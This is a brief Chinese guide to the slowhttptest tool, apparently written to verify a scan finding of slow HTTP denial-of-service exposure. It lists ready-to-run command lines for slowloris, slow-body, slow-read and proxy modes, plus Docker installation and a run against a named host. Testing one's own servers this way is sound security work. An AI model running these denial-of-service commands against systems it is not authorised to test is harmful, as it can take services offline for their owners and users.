检测到目标主机可能存在缓慢的HTTP拒绝服务攻击-slowhttptest食用指北

起因：

找到一个介绍不错的文章

slowhttptest

测试方式：

slowloris模式：

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

Slow Body攻击：

慢消息正文模式下的用法示例

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3

Slow Read模式：

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.co

慢节奏模式下的用法示例：

./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

通过在xxxx：8080上的代理进行探测：

./slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x

安装

https://github.com/shekyan/slowhttptest

docker pull shekyan/slowhttptest:latest 

docker run --rm 9cf05b -c 1000 -H -i 10 -r 200 -t GET -u https://win.test.com/wjgygw/index.html